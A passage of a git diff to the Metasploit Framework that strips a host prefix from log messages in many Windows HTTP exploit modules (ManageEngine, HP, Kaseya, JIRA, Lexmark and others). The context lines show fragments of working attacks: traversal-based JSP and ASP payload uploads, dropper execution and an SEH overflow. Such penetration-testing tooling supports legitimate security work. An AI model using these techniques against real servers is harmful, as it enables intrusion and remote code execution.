print_status("#{peer} - Injecting PHP payload...") + print_status("Injecting PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => path, @@ -163,10 +163,10 @@ class Metasploit3 < Msf::Exploit::Remote # # Load our payload # - print_status("#{peer} - Loading payload: #{path}#{b64_version}/#{@php_fname}") + print_status("Loading payload: #{path}#{b64_version}/#{@php_fname}") send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"}) if res and res.code == 404 - print_error("#{peer} - Server returned 404, the upload attempt probably failed.") + print_error("Server returned 404, the upload attempt probably failed.") return end diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 040045c4b4..5525b7fb10 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -83,15 +83,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(dropper_filename), diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 4534cad6c1..079cdae430 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -61,15 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(exe_filename) register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}") - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(jsp_name), diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 06e9747b3f..853bc561cd 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if not version return Exploit::CheckCode::Safe end - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version !~ /^(2\.\d|3\.0|3\.1)$/ return Exploit::CheckCode::Safe end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote if not path return Exploit::CheckCode::Detected end - vprint_status "#{peer} - Found path: #{path}" + vprint_status "Found path: #{path}" return Exploit::CheckCode::Appears end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote # get target if target.name =~ /Automatic/ version = get_version - vprint_status "#{peer} - Found version: #{version}" if version + vprint_status "Found version: #{version}" if version if not version or version !~ /^(2\.\d|3\.0|3\.1)$/ fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") elsif version =~ /(2\.0)/ @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path") end path << "\\users\\" - vprint_status "#{peer} - Using path: #{path}" + vprint_status "Using path: #{path}" # send payload sploit = rand_text_alpha(256 - path.length) sploit << generate_seh_payload(my_target.ret) - print_status "#{peer} - Sending request (#{sploit.length} bytes) to target (#{my_target.name})" + print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})" send_request_cgi({ 'uri' => '/chat.ghp', 'encode_params' => false, diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index ab43eac27d..c71ee36629 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => '/whatsnew.txt'}) if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ version = $1 - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ version = $1 - vprint_status "#{peer} - Based on Server header: #{version}" + vprint_status "Based on Server header: #{version}" end version @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get target version to determine how to reach call/jmp esp # - print_status("#{peer} - Fingerprinting version...") + print_status("Fingerprinting version...") version = get_version if target.name =~ /Automatic/ @@ -118,11 +118,11 @@ class Metasploit3 < Msf::Exploit::Remote elsif version =~ /4\.0/ my_target = targets[2] end - print_good("#{peer} - Version #{version} found") + print_good("Version #{version} found") else my_target = target unless version && my_target.name.include?(version) - print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...") + print_error("The selected target doesn't match the detected version, trying anyway...") end end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0x1002466D].pack("V") # Push eax > retn sploit << payload.encoded - print_status "#{peer} - Trying target #{my_target.name}..." + print_status "Trying target #{my_target.name}..." # # NOTE: Successful HTTP request is required to trigger diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index a69621f8e8..a770467975 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending malformed request...") + print_status("Sending malformed request...") send_request_raw({ 'method' => 'GET', 'uri' => exploit_uri, diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 04c5ae4b94..949c22a1e0 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = target_uri.to_s sploit << unc - print_status("#{peer} - Trying to ") + print_status("Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index ab30446ec0..82245bab7a 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote dropper = jsp_drop_bin(war, war_traversal) dropper_filename = rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...") + print_status("Uploading the JSP dropper #{dropper_filename}...") # The JSP, by default, is uploaded to: # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\ # In order to execute it, through the AutoPass application we would like to drop it here: @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote res.body.to_s.include?("java.lang.NullPointerException") && res.body.to_s.include?("com.hp.autopass") - print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...") + print_error("Unexpected response... upload maybe failed, trying anyway...") end res = send_request_cgi({ @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Unexpected response after executing the dropper...") + print_error("Unexpected response after executing the dropper...") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"), diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 8a17371a60..eb447a6e35 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri("/", "upload", "upload"), 'method' => 'PUT', @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri("/", "upload", jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index e468efc285..f3366ccfbd 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'method' => 'POST', @@ -96,13 +96,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index c9fdac58ba..a41ebf45b8 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -109,11 +109,11 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - vprint_status("#{peer} - Detecting tomcat version...") + vprint_status("Detecting tomcat version...") tomcat_version = get_tomcat_version if tomcat_version - print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...") + print_status("Tomcat #{tomcat_version} detected... Verifying traversal...") location = "" location << install_path location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/") @@ -122,19 +122,19 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - vprint_good("#{peer} - Traversal exists and parameters are correct...") + vprint_good("Traversal exists and parameters are correct...") return Exploit::CheckCode::Vulnerable elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - vprint_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") + vprint_warning("Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") return Exploit::CheckCode::Appears else - vprint_status("#{peer} - Failed to verify the directory traversal...") + vprint_status("Failed to verify the directory traversal...") end else - vprint_error("#{peer} - Tomcat version not detected...") + vprint_error("Tomcat version not detected...") end - vprint_status("#{peer} - Checking if the vulnerable web service and method exist...") + vprint_status("Checking if the vulnerable web service and method exist...") res = send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'), 'vars_get' => { 'wsdl' => 1 } @@ -151,16 +151,16 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - print_status("#{peer} - Retrieving the Tomcat version used...") + print_status("Retrieving the Tomcat version used...") tomcat_version = get_tomcat_version if tomcat_version.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used") else - print_good("#{peer} - Tomcat #{tomcat_version} found") + print_good("Tomcat #{tomcat_version} found") end - print_status("#{peer} - Verifying parameters to exploit the directory traversal...") + print_status("Verifying parameters to exploit the directory traversal...") brute_force = false location = "" location << install_path @@ -170,37 +170,37 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - print_good("#{peer} - Traversal parameters are correct") + print_good("Traversal parameters are correct") elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...") + print_error("Traversal parameters are incorrect, will try to brute force depth...") brute_force = true else fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters") end if brute_force - print_status("#{peer} - Trying to brute force the traversal depth...") + print_status("Trying to brute force the traversal depth...") depth = brute_force_depth(location) if depth.nil? fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH") end - print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...") + print_good("Using #{depth} as depth length to exploit the traversal...") end jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = upload_file(depth, location, jsp_name, payload.encoded) if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/ - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") + print_status("Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', jsp_name), diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 4c5df23135..65ba7b2ac3 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -219,16 +219,16 @@ class Metasploit3 < Msf::Exploit::Remote locations.each {|location| asp_location = location + asp_name - print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...") + print_status("Uploading #{asp.length} bytes to #{location}...") res = upload(asp, asp_location) if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/ - print_good("#{peer} - ASP Payload successfully wrote to #{location}") + print_good("ASP Payload successfully wrote to #{location}") payload_url = asp_location break elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/ - print_error("#{peer} - Error probably due to permissions while writing to #{location}") + print_error("Error probably due to permissions while writing to #{location}") else - print_error("#{peer} - Unknown error while while writing to #{location}") + print_error("Unknown error while while writing to #{location}") end } @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing payload through #{payload_url}...") + print_status("Executing payload through #{payload_url}...") send_request_cgi({ 'uri' => payload_url}) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index e82552a092..ed9ddab692 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -115,19 +115,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 11ae035e25..40eb5cab67 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -113,19 +113,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index b5f8e8b7af..a221aebd55 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote session = get_authenticated_session_id(initial_session, redirect) csrf_token = get_csrf_token(session) - print_status("#{peer} - Executing payload") + print_status("Executing payload") random_mark = Rex::Text.rand_text_alpha(5 + rand(5)) res = send_request_cgi( { @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_initial_session_id - print_status("#{peer} - Retrieving an initial JSESSIONID...") + print_status("Retrieving an initial JSESSIONID...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'servlet', 'Main'), 'method' => 'POST' @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(session_id) - print_status("#{peer} - Authenticating on HP SiteScope Configuration...") + print_status("Authenticating on HP SiteScope Configuration...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path.to_s, 'j_security_check'), @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_authenticated_session_id(session_id, redirect) - print_status("#{peer} - Following redirection to finish authentication...") + print_status("Following redirection to finish authentication...") res = send_request_cgi( { @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_csrf_token(session) - print_status("#{peer} - Getting anti-CSRF token...") + print_status("Getting anti-CSRF token...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'jsp', 'tabs.jsp'), 'cookie' => session diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 61734310a5..9310991d96 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # The path to the injection is something like: # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index de50318045..1fcd7c1d38 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -110,20 +110,20 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{@exe_filename}") return true else - print_error("#{peer} - Upload failed...") + print_error("Upload failed...") return false end end def upload_and_run_jsp(filename, contents) - print_status("#{peer} - Getting a valid CSRF token...") + print_status("Getting a valid CSRF token...") csrf_token = get_upload_token fail_with(Failure::Unknown, "#{peer} - Unable to find the CSRF token") if csrf_token.empty? - print_status("#{peer} - Exploiting traversal to upload JSP dropper...") + print_status("Exploiting traversal to upload JSP dropper...") upload_file(filename, contents, csrf_token) - print_status("#{peer} - Executing the dropper...") + print_status("Executing the dropper...") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, filename), @@ -150,15 +150,15 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating EXE...") + print_status("Generating EXE...") exe = payload.encoded_exe @exe_filename = Rex::Text.rand_text_alpha(8) + ".exe" - print_status("#{peer} - Generating JSP dropper...") + print_status("Generating JSP dropper...") dropper = jsp_drop_and_execute(exe, @exe_filename) dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading and running JSP dropper...") + print_status("Uploading and running JSP dropper...") upload_and_run_jsp(dropper_filename, dropper) end diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index 00748d0456..a481ff4676 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(payload, path, filename, session_id) - print_status("#{peer} - Uploading payload to #{path}...") + print_status("Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) - print_status("#{peer} - Executing payload #{asp_name}") + print_status("Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index 2839baa385..ab0204bfc9 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("SystemTab", "uploadImage.asp") @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}") data = post_data.to_s - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ "method" => "POST", "uri" => normalize_uri("SystemTab", "uploadImage.asp"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@payload_name) - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(@payload_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index abe6834898..bac17e0e49 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx" - print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...") + print_status("Uploading #{asp.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]") + print_error("Upload failed on #{attack_url} [#{res.code} #{res.message}]") return end @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # EXECUTE # upload_path = uri_path + "ldlogon/#{upload_random}.asp" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code >= 300) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx" - print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...") + print_status("Deleting #{upload_path} through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -162,10 +162,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]") + print_error("Deletion failed at #{attack_url} [#{res.code} #{res.message}]") return end diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 44441df158..39c4b04f60 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" - print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") + print_status("Uploading info leak JSP #{jsp_name_leak}...") if upload_file(traversal_leak, jsp_leak) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end @@ -86,25 +86,25 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") end jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_payload = payload.encoded traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" - print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") + print_status("Uploading JSP payload #{jsp_payload_name}...") if upload_file(traversal_payload, jsp_payload) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload_name, 3) end diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 14391ebab3..18ae25b9b5 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine OpManager") + vprint_status("Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = 